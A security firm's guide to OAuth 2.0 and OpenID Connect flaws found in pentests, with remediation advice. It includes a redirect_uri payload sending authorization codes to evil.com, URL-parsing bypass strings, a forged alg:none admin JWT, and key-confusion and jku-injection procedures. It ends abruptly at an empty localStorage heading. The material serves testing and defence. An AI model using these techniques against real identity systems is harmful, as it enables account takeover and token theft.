
OAuth 2.0 and OpenID Connect Security Vulnerabilities: What Pentesters Find in Real Assessments

Lorikeet Security Team April 9, 2026 52 min read

TL;DR: OAuth 2.0 and OpenID Connect power authentication and authorization for the majority of modern web applications, but their flexibility creates a massive attack surface when implementations deviate from security best practices. In our penetration testing engagements, we routinely find redirect URI bypasses, missing PKCE, token leakage through referrer headers and browser history, JWT validation failures including the alg:none attack, state parameter omissions enabling CSRF, scope escalation through parameter tampering, and insecure token storage in localStorage. This guide walks through every major OAuth/OIDC vulnerability class we encounter, explains the attack mechanics in detail, provides real-world examples from production applications, and gives concrete remediation guidance for each issue.


Why OAuth 2.0 and OpenID Connect Are Everywhere -- And Why They Are So Frequently Misconfigured

OAuth 2.0 has become the de facto standard for delegated authorization on the web. Published as RFC 6749 in 2012, it replaced a patchwork of proprietary authentication schemes with a single framework that allows users to grant third-party applications limited access to their resources without sharing credentials. OpenID Connect (OIDC), built as an identity layer on top of OAuth 2.0 and finalized in 2014, extended the framework to handle authentication as well, giving applications a standardized way to verify user identity and obtain basic profile information through ID tokens.

The adoption numbers are staggering. Every major identity provider -- Google, Microsoft Entra ID (formerly Azure AD), Okta, Auth0, AWS Cognito, Keycloak, PingIdentity -- implements OAuth 2.0 and OIDC. If your application supports "Sign in with Google" or "Sign in with Microsoft," you are using OIDC. If your API accepts bearer tokens, you are almost certainly using OAuth 2.0. If your mobile application authenticates against a backend API, the authorization code flow with PKCE is the recommended mechanism. SaaS platforms, fintech applications, healthcare portals, e-commerce sites, and internal enterprise tools all rely on these protocols for their core authentication and authorization mechanisms.

The problem is that OAuth 2.0 is a framework, not a protocol in the rigid sense. RFC 6749 deliberately leaves many implementation decisions to developers. It defines multiple grant types (authorization code, implicit, client credentials, resource owner password credentials), allows for extension grants, leaves redirect URI validation rules somewhat flexible, and does not mandate specific token formats. OIDC adds structure with JWTs and discovery endpoints, but it too allows significant implementation flexibility. This flexibility is what made OAuth 2.0 successful -- it can be adapted to web applications, mobile apps, single-page applications, IoT devices, and server-to-server communication. It is also what makes it dangerous.

When we conduct web application penetration tests, we find OAuth/OIDC misconfigurations in a significant majority of applications that implement these protocols. The reasons are consistent across engagements: the specification leaves critical decisions (redirect URI matching, token format, flow selection) to each implementer; sample code and SDK defaults favor backward compatibility over security; and secondary flows such as account linking, re-authorization, and mobile callbacks receive far less security review than the primary login flow.

The consequence is that OAuth/OIDC vulnerabilities are not theoretical. They are practical, exploitable, and present in production applications right now. In this guide, we walk through every major vulnerability class we encounter in real penetration testing assessments, explain the attack mechanics, provide concrete exploitation techniques, and detail how to fix each issue.


Authorization Code Flow vs. Implicit Flow: A Security Analysis

Understanding the security properties of different OAuth 2.0 grant types is foundational to understanding why certain vulnerabilities exist. The two flows most relevant to web applications -- the authorization code flow and the implicit flow -- have fundamentally different security characteristics.

The Authorization Code Flow

The authorization code flow is the recommended grant type for server-side web applications and, when combined with PKCE, for single-page applications and mobile apps. The flow operates in two phases:

Phase 1 -- Authorization Request: The client application redirects the user's browser to the authorization server's /authorize endpoint with parameters including response_type=code, client_id, redirect_uri, scope, and state. The user authenticates with the authorization server and grants consent. The authorization server redirects the user back to the client's redirect_uri with a short-lived authorization code in the query string.

Phase 2 -- Token Exchange: The client application makes a back-channel (server-to-server) HTTP POST request to the authorization server's /token endpoint, presenting the authorization code along with its client_id and client_secret. The authorization server validates the code and credentials, then returns an access token (and optionally a refresh token and ID token) in the HTTP response body.

The security properties of this flow are significant. The access token is never exposed to the user's browser. It travels only over the back-channel between the client server and the authorization server. The authorization code is exposed in the browser's URL bar and potentially in server logs, but it is short-lived (typically 30-60 seconds), single-use, and cannot be exchanged for tokens without the client secret. An attacker who intercepts the authorization code through a referrer header or browser history still cannot obtain tokens without also compromising the client secret.
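The two phases above can be sketched in a few lines of Python. This is a minimal illustration, not a client library: the token endpoint URL, client credentials, and parameter values are hypothetical, and the actual POST (shown as a comment) would be made server-side with any HTTP client.

```python
from urllib.parse import urlencode

TOKEN_ENDPOINT = "https://auth.example.com/token"  # hypothetical authorization server

def build_token_request(code: str, client_id: str, client_secret: str,
                        redirect_uri: str) -> dict:
    """Form body for the Phase 2 back-channel code exchange (RFC 6749, section 4.1.3)."""
    return {
        "grant_type": "authorization_code",
        "code": code,                    # short-lived, single-use code from Phase 1
        "redirect_uri": redirect_uri,    # must match the Phase 1 redirect_uri exactly
        "client_id": client_id,
        "client_secret": client_secret,  # never exposed to the browser
    }

body = urlencode(build_token_request(
    "SplxlOBeZQQYbYS6WxSbIA", "s6BhdRkqt3", "server-side-secret",
    "https://app.example.com/callback"))
# POST `body` to TOKEN_ENDPOINT as application/x-www-form-urlencoded;
# the JSON response contains access_token and, optionally, refresh_token and id_token.
```

Because this request runs server-to-server, an attacker who steals the authorization code from the browser still lacks the client_secret needed to complete it.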

The Implicit Flow

The implicit flow was designed for browser-based applications (single-page applications) that could not securely store a client secret. Instead of returning an authorization code, the authorization server returns the access token directly in the URL fragment (#access_token=...) of the redirect URI. There is no back-channel token exchange.

The security problems with this approach are severe:

  1. The access token is delivered in the URL, so it lands in browser history and can be captured by any JavaScript running on the callback page.
  2. There is no back-channel exchange and no client authentication at token issuance, so an intercepted token is immediately usable.
  3. The token cannot be bound to the client that requested it, making replay by anyone who obtains it trivial.

RFC 9700 (OAuth 2.0 Security Best Current Practice) explicitly states: "The implicit grant (response type 'token') and other response types causing the authorization server to issue access tokens in the authorization response are vulnerable to access token leakage and access token replay." The recommendation is clear: do not use the implicit flow. Use the authorization code flow with PKCE instead, even for single-page applications.

What we find in practice: Despite the implicit flow being formally deprecated for years, we still encounter it in approximately 20-30% of penetration testing engagements involving OAuth. The most common scenarios are legacy single-page applications built before PKCE adoption, applications using older versions of identity provider SDKs that default to the implicit flow, and applications where developers chose response_type=token because it required fewer steps to implement. Many identity providers (including some enterprise Entra ID configurations) still allow the implicit flow to be enabled with a single checkbox.

The Hybrid Flow

OIDC also defines hybrid flows that combine elements of both the authorization code and implicit flows. For example, response_type=code token returns both an authorization code and an access token in the front channel. While the authorization code can still be exchanged securely on the back channel, the access token exposed in the front channel suffers from all the same vulnerabilities as the implicit flow. Hybrid flows should be used with extreme caution, and in most cases, the pure authorization code flow with PKCE is preferable.


Redirect URI Validation Bypass Techniques

Redirect URI validation is the single most critical security control in the OAuth 2.0 authorization flow. When a user completes authentication, the authorization server redirects their browser back to the client application's redirect_uri along with an authorization code or token. If an attacker can manipulate the redirect_uri to point to a server they control, they receive the authorization code or token instead of the legitimate client.

RFC 6749 requires that the authorization server validate the redirect URI against pre-registered values. However, the specification allows for both exact match and partial match validation, and many implementations get this wrong. Here are the bypass techniques we use in penetration tests, ordered by frequency of success:

Subdomain Matching Bypass

Many authorization servers validate the redirect URI by checking if it matches the registered domain. If the registered redirect URI is https://app.example.com/callback, the server might accept any subdomain of example.com. An attacker who controls https://evil.example.com (perhaps through a subdomain takeover or a compromised subdomain) can set redirect_uri=https://evil.example.com/callback and receive the authorization code.

In practice, subdomain takeovers are extremely common. Organizations frequently have dangling DNS records pointing to deprovisioned cloud resources (AWS Elastic Beanstalk, Azure App Service, Heroku, GitHub Pages). If the CNAME record still exists but the resource has been deleted, an attacker can claim that resource and receive traffic for the subdomain. When combined with a loose redirect URI validation, this becomes a direct path to account takeover.

Path Traversal and Open Redirect Chains

If the authorization server validates only the scheme, host, and port of the redirect URI but allows arbitrary paths, an attacker can abuse open redirect vulnerabilities on the legitimate domain. Consider a registered redirect URI of https://app.example.com/oauth/callback. If the application has an open redirect at https://app.example.com/goto?url=https://evil.com, the attacker can set:

redirect_uri=https://app.example.com/goto?url=https://evil.com

The authorization server sees that the redirect URI is on app.example.com and accepts it. The user's browser follows the redirect to app.example.com/goto, which then redirects to evil.com with the authorization code or token in the URL. This is one of the most reliable bypass techniques because open redirect vulnerabilities are extremely common, and many security teams classify them as low-severity issues that do not warrant immediate remediation.

URL Parsing Inconsistencies

Different URL parsers handle edge cases differently, and these inconsistencies can be exploited to bypass redirect URI validation. Common techniques include:

  1. Userinfo tricks: in https://app.example.com@evil.com, some validators treat app.example.com as the host, while the browser treats it as credentials and navigates to evil.com.
  2. Backslash confusion: URLs like https://app.example.com\@evil.com are parsed differently by browsers (which normalize backslashes to forward slashes) and by many server-side libraries.
  3. Percent-encoding and double-encoding of delimiters such as @, /, #, and ? so that the validator and the browser disagree about where the host ends.
  4. Unicode normalization and confusable characters in the hostname that only resolve to the attacker's domain after validation has passed.

Wildcard and Prefix Matching

Some identity providers allow wildcard patterns in redirect URI registrations. A registration like https://app.example.com/* or even https://*.example.com/callback gives attackers significant flexibility. Even without explicit wildcards, many authorization servers implement prefix matching, accepting any URL that begins with the registered redirect URI. If the registered URI is https://app.example.com/callback, the server might accept https://app.example.com/callback.evil.com or https://app.example.com/callback/../../../evil-path.
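A safe validator sidesteps all of the matching pitfalls above by comparing against an exact allow-list. A minimal sketch, with a hypothetical registered URI:

```python
# Exact-match validation: the only redirect_uri comparison that resists
# prefix, wildcard, subdomain, and path-traversal bypasses.
REGISTERED_REDIRECT_URIS = {
    "https://app.example.com/callback",  # hypothetical registration
}

def redirect_uri_allowed(uri: str) -> bool:
    # Byte-for-byte comparison; no normalization, no startswith(), no regex
    return uri in REGISTERED_REDIRECT_URIS
```

Under this check, https://app.example.com/callback.evil.com, https://evil.example.com/callback, and every path-traversal variant are rejected, because none of them is literally in the set.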

Localhost and Custom Scheme Bypasses

For mobile applications and desktop applications, OAuth 2.0 allows redirect URIs using custom URI schemes (e.g., myapp://callback) or http://localhost with a dynamic port. If the authorization server accepts http://localhost as a valid redirect URI for a web application, an attacker running a local HTTP server on the victim's machine (through malware or a compromised browser extension) can intercept the authorization code. Similarly, custom URI schemes on mobile platforms can be claimed by malicious applications through scheme hijacking on Android or through similar techniques on other platforms.

Pentester's note: When testing redirect URI validation, we always start by modifying the redirect_uri parameter systematically: changing the path, adding subdomains, injecting URL-encoded characters, testing with and without trailing slashes, adding query parameters, inserting fragments, and testing every URL parsing edge case. We also enumerate all open redirects on the application domain, as these are frequently the easiest path to a redirect URI bypass. Tools like Burp Suite's Collaborator can confirm out-of-band that redirected requests are reaching an attacker-controlled server.


Token Leakage via Referrer Headers, Browser History, and Logs

Even when the OAuth flow itself is implemented correctly, tokens and authorization codes can leak through side channels. Token leakage is a category of vulnerability where sensitive OAuth artifacts end up in locations accessible to attackers, often without any direct exploitation of the OAuth implementation itself.

Referrer Header Leakage

When the authorization server redirects the user back to the client application with an authorization code in the query string (e.g., https://app.example.com/callback?code=abc123&state=xyz), the full URL is stored in the browser as the current page's URL. If that callback page loads any external resources -- third-party JavaScript, analytics scripts, tracking pixels, social media widgets, or even a single image hosted on a CDN -- the browser sends the full URL in the Referer header to the server hosting that resource.

This means the authorization code is sent to every third-party server referenced by the callback page. If any of those third-party services are compromised, or if the third party logs referrer headers (which most analytics services do), the authorization code is available to the third party. If the authorization code has not yet been exchanged for tokens and has not expired, the third party can exchange it themselves.

The same issue affects the implicit flow even more severely. When the access token is in the URL fragment, it is accessible to any JavaScript on the page. While the fragment is not normally sent in the Referer header, any script on the callback page can read window.location.hash and transmit the token to an external server. If the callback page includes a compromised third-party script (a supply chain attack), the access token is immediately exfiltrated.

The mitigation for referrer leakage is straightforward: set the Referrer-Policy header to no-referrer or strict-origin on the callback page, and minimize external resources loaded on that page. Better yet, use the response_mode=form_post parameter, which causes the authorization server to deliver the authorization code via an HTTP POST to the callback URL rather than as a query parameter in a redirect. POST body parameters are never included in referrer headers.
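Requesting form_post delivery is a single extra parameter on the authorization request. A sketch, with hypothetical endpoint and client values:

```python
from urllib.parse import urlencode

def build_authorize_url(client_id: str, redirect_uri: str, state: str) -> str:
    params = {
        "response_type": "code",
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "scope": "openid profile",
        "state": state,
        # Deliver the code in a POST body instead of the query string:
        # it then never reaches Referer headers, browser history, or access logs.
        "response_mode": "form_post",
    }
    return "https://auth.example.com/authorize?" + urlencode(params)
```

The callback response itself should still carry Referrer-Policy: no-referrer and Cache-Control: no-store as defense in depth.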

Browser History Leakage

Every redirect in the OAuth flow creates an entry in the browser's history. The authorization code (in the query string) and tokens (in the URL fragment for implicit flows) are preserved in this history. On shared computers, kiosk terminals, or any device where multiple users access the same browser profile, this history is accessible to subsequent users. Even on personal devices, browser history is often synced across devices through browser profile synchronization (Chrome Sync, Firefox Sync, Safari iCloud), potentially exposing tokens on devices with weaker security controls.

After successfully exchanging the authorization code, the client application should immediately redirect the user to a clean URL (without the code in the query string) using history.replaceState() or a server-side redirect. This removes the authorization code from the browser's history and address bar. We frequently find that applications skip this step, leaving valid (or recently valid) authorization codes in the browser history indefinitely.

Server Log Leakage

Web server access logs typically record the full URL of every request, including query string parameters. If authorization codes are delivered via query string (the default for the authorization code flow), they are recorded in the web server logs of the client application. These logs are often stored in plaintext, retained for extended periods, accessible to operations and development teams, and may be shipped to centralized logging services (Splunk, ELK Stack, Datadog) where they are retained and indexed.

In one engagement, we found authorization codes stored in an Elasticsearch cluster that was accessible without authentication from the internal network. The codes were single-use and short-lived, so direct exploitation was not possible. However, the logging infrastructure also captured the full HTTP request including the Authorization: Bearer header for subsequent API calls. The access tokens in those logs were long-lived (24 hours) and could be replayed directly. This is a common pattern: even if the OAuth flow is secure, the tokens are only as secure as the infrastructure that handles them after issuance.

Error Page Leakage

When the OAuth callback encounters an error, many applications display a debug error page that includes the request parameters -- including the authorization code. If these error pages are served in production (a common misconfiguration), the authorization code is displayed in the page source and may be cached by CDNs, proxies, or search engine crawlers. We have also seen authorization codes leaked through stack traces in error reporting services like Sentry and Bugsnag, where the full request URL is captured as part of the error context.


State Parameter CSRF Attacks

The state parameter in OAuth 2.0 serves as a CSRF protection mechanism. Without it, an attacker can force a victim to complete an OAuth flow that links the victim's account to the attacker's identity provider account, or that authenticates the victim into the attacker's account on the client application.

How the Attack Works

The attack exploits the fact that the OAuth authorization flow involves a redirect from the client application to the authorization server and back. An attacker can initiate an OAuth flow, authenticate with their own credentials, receive an authorization code, and then trick the victim into completing the flow by visiting the callback URL with the attacker's authorization code.

Here is the step-by-step attack for a login CSRF scenario:

  1. The attacker initiates the OAuth login flow on the target application.
  2. The attacker authenticates with their own credentials at the identity provider.
  3. The identity provider redirects the attacker's browser to the callback URL: https://app.example.com/callback?code=ATTACKER_CODE.
  4. The attacker intercepts this redirect (using a proxy or by pausing the flow) and does not complete it.
  5. The attacker sends the callback URL to the victim (via email, chat, or embedding it in a web page as an image tag or iframe).
  6. The victim's browser follows the URL, and the target application exchanges the authorization code for tokens -- tokens associated with the attacker's account.
  7. The victim is now logged into the application as the attacker. Any data the victim enters (personal information, payment details, documents) is accessible to the attacker.

This is known as "login CSRF" and is more common than many developers realize. The impact depends on the application: in a note-taking application, the attacker sees everything the victim writes. In a financial application, the victim might link their bank account to the attacker's session. In a cloud storage application, the victim uploads sensitive files to the attacker's account.

Account Linking CSRF

A more dangerous variant occurs when an application allows linking multiple identity providers to a single account (e.g., "Connect your Google account" or "Link your GitHub account"). If the linking flow does not verify the state parameter, an attacker can force the victim to link the attacker's identity provider account to the victim's application account. After the link is complete, the attacker can log in as the victim using their own identity provider credentials.

We find this vulnerability frequently in applications that allow social login connections. The "connect" flow is often implemented as an afterthought, with less rigorous security review than the primary login flow.

Proper State Parameter Implementation

The state parameter must be:

  1. Unpredictable: generated with a cryptographically secure random number generator, with at least 128 bits of entropy.
  2. Bound to the user's browser session: stored server-side (or in an httpOnly cookie), never somewhere page scripts can overwrite it.
  3. Validated on every callback: the flow must abort if the returned value is missing or does not match.
  4. Single-use: invalidated as soon as it has been checked, so a captured value cannot be replayed.

What we find in practice: The most common state parameter issues we encounter are: (1) the state parameter is omitted entirely, (2) the state parameter is present but not validated on the callback, (3) the state parameter is a predictable value like the user's session ID or a sequential counter, (4) the state parameter is validated but not bound to the session (stored in localStorage where it can be overwritten by the attacker through XSS), and (5) the state parameter is correctly implemented for the login flow but missing from account linking or re-authorization flows.
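A minimal server-side sketch of correct state handling, assuming a dict-like server-side session store:

```python
import hmac
import secrets

def new_state(session: dict) -> str:
    """Generate an unpredictable state value and bind it to the session."""
    state = secrets.token_urlsafe(32)  # 256 bits from a CSPRNG
    session["oauth_state"] = state
    return state

def check_state(session: dict, returned_state) -> bool:
    """Validate the callback's state; consume it so it is single-use."""
    expected = session.pop("oauth_state", None)
    if expected is None or returned_state is None:
        return False  # no state to compare: abort the flow
    return hmac.compare_digest(expected, returned_state)
```

Note that check_state pops the stored value, so a second callback with the same state fails, and the constant-time comparison avoids leaking the expected value through timing.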


Scope Escalation and Consent Screen Bypass

OAuth 2.0 scopes define the level of access that a client application requests. When a user authorizes an application, the consent screen displays the requested scopes (e.g., "This application wants to read your email" or "This application wants to manage your repositories"). The user can then make an informed decision about whether to grant access. Scope escalation attacks attempt to obtain broader access than the user intended to grant.

Scope Parameter Tampering

The most straightforward scope escalation attack involves modifying the scope parameter in the authorization request. If a legitimate application requests scope=email profile, an attacker who controls the authorization request (through a man-in-the-middle position, XSS, or by directly crafting a malicious link) can change it to scope=email profile admin or scope=email profile https://www.googleapis.com/auth/admin.directory.user.

Whether this works depends on the authorization server's behavior. Well-configured authorization servers will display the elevated scope on the consent screen, giving the user an opportunity to reject the request. However, several scenarios bypass this protection:

  1. The client has been consented before, and the server auto-approves subsequent requests -- including requests with broader scopes -- without re-prompting.
  2. The consent screen shows a friendly application name and vague scope descriptions, so users approve elevated access without understanding it.
  3. The authorization server validates scopes only at the authorization endpoint, allowing a different (broader) scope value to be supplied at the token endpoint.

Consent Screen Bypass

Some OAuth implementations allow bypassing the consent screen entirely under certain conditions:

  1. First-party or "trusted" clients are configured to skip consent, so any request using their client_id is approved silently.
  2. An administrator has granted tenant-wide consent (common in enterprise Entra ID), suppressing the prompt for every user in the organization.
  3. prompt=none requests against an existing identity provider session reissue tokens without any user interaction.

Token Scope Verification Failures

Even when scopes are properly requested and consented, the resource server (API) must verify that the access token's scope is sufficient for the requested operation. In many implementations, the resource server does not validate scopes at all -- any valid access token is accepted for any API endpoint, regardless of the scopes it was granted. This effectively makes scopes a cosmetic feature rather than a security control.

In one engagement, we obtained an access token with scope=read and successfully used it to call write and delete API endpoints because the API gateway only verified the token's signature and expiration, not its scope claims. This is particularly common in microservice architectures where each service validates the JWT independently but only checks the signature, not the payload claims.
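Enforcing scopes at the resource server can be as simple as the check below, run after signature validation succeeds. The claim layout is an assumption: "scope" as a space-delimited string is the common convention, and some providers instead emit an "scp" list claim, so the sketch handles both.

```python
def token_has_scope(claims: dict, required: str) -> bool:
    """Check a validated token's scope claims before serving the request."""
    raw = claims.get("scope", "")
    # "scope" is conventionally a space-delimited string; some IdPs use
    # an "scp" list claim instead -- handle both defensively.
    granted = set(raw.split()) if isinstance(raw, str) else set(raw)
    granted |= set(claims.get("scp", []))
    return required in granted
```

With this in place, the scope=read token from the engagement above would be rejected by write and delete endpoints instead of silently accepted.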


PKCE: What It Solves and When It Is Missing

Proof Key for Code Exchange (PKCE, pronounced "pixie") was introduced in RFC 7636 to address a specific vulnerability in the authorization code flow: authorization code interception. While the authorization code flow is more secure than the implicit flow because the access token is exchanged on the back channel, the authorization code itself is still delivered through the front channel (the user's browser) and can be intercepted.

The Authorization Code Interception Problem

In the standard authorization code flow without PKCE, the security of the flow relies on two factors: possession of the authorization code and possession of the client secret. For confidential clients (server-side applications), the client secret is stored securely on the server, and an attacker who intercepts the authorization code cannot exchange it without the secret.

But for public clients -- mobile applications, single-page applications, desktop applications -- there is no client secret. The application's source code is accessible to the user (and therefore to attackers), so any embedded secret can be extracted. Without a client secret, the only thing preventing an attacker from exchanging a stolen authorization code is the code itself.

Authorization code interception can happen in several ways:

  1. On mobile platforms, a malicious application registers the same custom URI scheme as the legitimate app and receives the redirect containing the code.
  2. Malware, a compromised browser extension, or another local process reads the code from the browser history, system logs, or inter-process communication.
  3. A network-level attacker captures the redirect on a hop where TLS is absent or improperly terminated.
  4. The code leaks through the referrer header, log, and error-page channels described earlier in this guide.

How PKCE Works

PKCE adds a proof-of-possession mechanism to the authorization code flow. The process works as follows:

  1. The client generates a cryptographically random string called the code_verifier (between 43 and 128 characters from the unreserved character set).
  2. The client computes the code_challenge by applying a SHA-256 hash to the code_verifier and Base64URL-encoding the result. (The plain method -- where the challenge equals the verifier -- is also defined but provides weaker security.)
  3. The client includes the code_challenge and code_challenge_method=S256 in the authorization request.
  4. The authorization server stores the code_challenge associated with the authorization code it issues.
  5. When the client exchanges the authorization code for tokens, it includes the original code_verifier in the token request.
  6. The authorization server hashes the received code_verifier, compares it to the stored code_challenge, and only issues tokens if they match.

The key insight is that the code_challenge is sent in the authorization request (which is public), but the code_verifier is sent only in the token exchange request (which is direct from client to server). An attacker who intercepts the authorization code does not have the code_verifier and cannot compute it from the code_challenge (because SHA-256 is a one-way function). Therefore, the intercepted authorization code is useless.
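Steps 1, 2, and 6 of the flow above can be sketched in a few lines of Python (function names are illustrative):

```python
import base64
import hashlib
import secrets

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def make_pkce_pair() -> tuple:
    """Client side: generate (code_verifier, code_challenge) per RFC 7636."""
    verifier = b64url(secrets.token_bytes(32))  # 43 chars, the RFC minimum
    challenge = b64url(hashlib.sha256(verifier.encode("ascii")).digest())
    return verifier, challenge

def challenge_matches(verifier: str, stored_challenge: str) -> bool:
    """Authorization server side: re-hash the verifier at the token endpoint."""
    return b64url(hashlib.sha256(verifier.encode("ascii")).digest()) == stored_challenge
```

The verifier never appears in the front channel, so an attacker holding only the authorization code and the code_challenge cannot complete step 5.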

When PKCE Is Missing

Despite being recommended for all clients (including confidential clients) since RFC 9700, PKCE adoption remains incomplete. In our assessments, we find PKCE missing in the following scenarios:

  1. Mobile and desktop applications built before identity provider SDKs supported RFC 7636, which have never been retrofitted.
  2. Confidential server-side clients whose developers assume the client secret makes PKCE unnecessary.
  3. Single-page applications still on the implicit flow, where there is no authorization code to protect.
  4. Deployments where the authorization server accepts PKCE parameters when the client sends them but still issues tokens when they are absent.

Critical finding: The PKCE downgrade attack is one of the most underappreciated OAuth vulnerabilities. We have encountered multiple identity providers where PKCE is "supported" but not "enforced." In these configurations, PKCE provides no security benefit because an attacker can simply strip the PKCE parameters from the authorization request. Always verify that the authorization server is configured to require PKCE, not merely accept it.


JWT Validation Failures: alg:none, Key Confusion, and Signature Stripping

JSON Web Tokens (JWTs) are the standard token format for OpenID Connect ID tokens and are widely used for OAuth 2.0 access tokens. A JWT consists of three Base64URL-encoded parts separated by periods: the header (specifying the algorithm and token type), the payload (containing claims like issuer, subject, audience, and expiration), and the signature. The security of JWTs depends entirely on proper signature validation. When validation is flawed, attackers can forge tokens and impersonate any user.

The alg:none Attack

The JWT specification (RFC 7519) defines an "unsecured JWT" where the algorithm in the header is set to "alg": "none" and the signature section is empty. This was intended for use cases where the JWT is transported over a secure channel and integrity is guaranteed by other means. In practice, this feature has been a source of critical vulnerabilities.

The attack is simple: take a valid JWT, decode the header, change the alg field to "none", modify the payload claims as desired (e.g., change the sub claim to an administrator's user ID), re-encode the header and payload, and remove the signature (leaving the trailing period). If the server accepts alg:none, the forged token is accepted as valid.

# Original JWT header
{"alg": "RS256", "typ": "JWT"}

# Modified header
{"alg": "none", "typ": "JWT"}

# Forged token (note the empty signature after the trailing period)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImlhdCI6MTcxMjYyMDgwMH0.

This vulnerability was first widely publicized in 2015 by security researcher Tim McLean, whose advisory (published on Auth0's blog) showed that many JWT libraries, including the widely used jsonwebtoken (Node.js), PyJWT (Python), and ruby-jwt (Ruby), accepted alg:none by default. The affected libraries have since been patched, but custom JWT validation code, older library versions, and misconfigured validation settings continue to exhibit this vulnerability.

Variations of the alg:none attack include using different capitalizations ("None", "NONE", "nOnE") to bypass case-sensitive blocklists, and using URL-encoding or whitespace padding to evade signature checks.
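The forgery described above is only a few lines of Python. This sketch reproduces the tampering step; the claims are illustrative:

```python
import base64
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def forge_alg_none(claims: dict) -> str:
    """Build an unsigned token that a vulnerable verifier would accept."""
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"},
                               separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header}.{payload}."  # empty signature after the trailing period
```

Any verifier that accepts the output of forge_alg_none({"sub": "admin"}) is critically vulnerable.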

RSA/HMAC Key Confusion (Algorithm Substitution)

This attack exploits a fundamental difference between symmetric and asymmetric signature algorithms. When a JWT is signed with RSA (e.g., RS256), the authorization server uses its private key to sign the token, and the client or resource server uses the corresponding public key to verify the signature. The public key is, by definition, public -- it is often available at the authorization server's JWKS endpoint (/.well-known/jwks.json).

When a JWT is signed with HMAC (e.g., HS256), the same secret key is used for both signing and verification.

The attack works as follows:

  1. The target application normally uses RS256 to verify JWTs and is configured with the authorization server's RSA public key.
  2. The attacker obtains the RSA public key (from the JWKS endpoint or the server's TLS certificate).
  3. The attacker creates a JWT with "alg": "HS256" in the header and the desired claims in the payload.
  4. The attacker signs the JWT using HMAC-SHA256 with the RSA public key as the HMAC secret.
  5. When the server receives the token, a vulnerable JWT library reads the alg header, sees HS256, and uses the configured key (the RSA public key) as the HMAC verification key. Since the attacker signed the token with the same key, the signature is valid.

This attack is devastating because the RSA public key is public knowledge, meaning any attacker can forge valid tokens for any user. The fix is straightforward: the verification code must enforce the expected algorithm and never trust the alg header from the token itself. Modern JWT libraries provide an algorithms parameter that restricts which algorithms are accepted during verification.
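The defensive pattern is to pin the algorithm server-side and treat the token's alg header as untrusted input. The sketch below uses HS256 so it is self-contained with the standard library; with a real library the same intent is expressed through an explicit allow-list (e.g., PyJWT's jwt.decode(token, key, algorithms=["RS256"])).

```python
import base64
import hashlib
import hmac
import json

EXPECTED_ALG = "HS256"  # pinned in server configuration, never read from the token

def _b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def verify_jwt(token: str, key: bytes) -> dict:
    parts = token.split(".")
    if len(parts) != 3 or not all(parts):
        raise ValueError("token must have three non-empty segments")
    header = json.loads(_b64url_decode(parts[0]))
    # One strict comparison defeats alg:none (in any capitalization),
    # RSA/HMAC key confusion, and signature stripping.
    if header.get("alg") != EXPECTED_ALG:
        raise ValueError("unexpected algorithm")
    expected = hmac.new(key, f"{parts[0]}.{parts[1]}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(parts[2])):
        raise ValueError("invalid signature")
    return json.loads(_b64url_decode(parts[1]))
```

Because the accepted algorithm is a server-side constant, an attacker-controlled alg header can never select the verification routine.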

Signature Stripping

Some JWT implementations have a flaw where they validate the signature only if one is present. If the signature section of the JWT is completely removed (not just empty, but absent -- resulting in only two Base64URL-encoded sections separated by a single period), the validation logic may treat the token as unsigned and accept it without any verification.

This differs from the alg:none attack in that the header may still specify RS256 or another algorithm, but the signature is simply not present. The vulnerable code path typically looks like:

parts = token.split('.')
if len(parts) == 3:
    verify_signature(parts[0], parts[1], parts[2])
# If only 2 parts, signature verification is skipped entirely
payload = decode(parts[1])

JWK Injection and jku/x5u Header Manipulation

The JWT header can include a jwk (JSON Web Key) claim that embeds the verification key directly in the token, a jku (JWK Set URL) claim that points to a URL containing the verification keys, or an x5u (X.509 URL) claim that points to a certificate chain. If the verification code trusts these claims without restriction:

  1. jwk injection: the attacker generates their own key pair, signs a forged token with the private key, and embeds the matching public key in the header. The server verifies the signature against the attacker's key and accepts the token.
  2. jku manipulation: the attacker hosts their own JWK Set on a server they control and points the jku header at it. Fetching attacker-supplied URLs can also be leveraged for server-side request forgery.
  3. x5u manipulation: the same attack using an attacker-supplied certificate chain URL instead of a JWK Set.

Mitigations include ignoring jwk, jku, and x5u headers in incoming tokens, using locally configured keys for verification, and if JWKS URLs must be dynamic, restricting them to a whitelist of trusted URLs.

Expired and Replayed Tokens

JWTs include an exp (expiration time) claim, but not all servers validate it. We regularly find servers that accept expired tokens, sometimes months or years after they were issued. Combined with token leakage from logs or browser history, this means that old tokens can be replayed to gain access.

Similarly, the aud (audience) claim should be validated to ensure the token was intended for the specific resource server. If a token issued for api-a.example.com is accepted by api-b.example.com, an attacker with access to any service in the ecosystem can use their tokens to access other services. This is known as a confused deputy attack.
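
Both checks are only a few lines once the payload has been signature-verified; a sketch (claim names from RFC 7519, everything else ours):

```python
import time

def check_claims(claims: dict, expected_audience: str, leeway: int = 30) -> None:
    """Enforce expiry and audience on an already signature-verified payload."""
    exp = claims.get("exp")
    if exp is None or time.time() > exp + leeway:
        raise PermissionError("token expired or missing exp claim")
    # aud may be a single string or a list of strings (RFC 7519, section 4.1.3)
    aud = claims.get("aud")
    audiences = aud if isinstance(aud, list) else [aud]
    if expected_audience not in audiences:
        raise PermissionError("token not intended for this resource server")
```

A missing exp or aud claim is treated as a failure, not a pass: tokens that omit the claim are rejected rather than accepted by default.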

Testing approach: When we test JWT validation, we use a systematic methodology: (1) test alg:none with multiple capitalizations, (2) test RSA/HMAC key confusion if the public key is available, (3) test JWK injection and JKU/X5U manipulation, (4) test with expired tokens, (5) test with tokens issued for a different audience, (6) modify individual claims (sub, role, permissions) and verify whether the server detects tampering, (7) test with completely invalid signatures to ensure signature verification is not bypassed. Tools like jwt_tool by ticarpi automate many of these tests.


Token Storage Mistakes: localStorage vs. httpOnly Cookies

How and where an application stores OAuth tokens after obtaining them is a critical security decision. The two most common storage mechanisms for browser-based applications are localStorage and HTTP-only cookies, and they have fundamentally different security properties.

The localStorage Problem

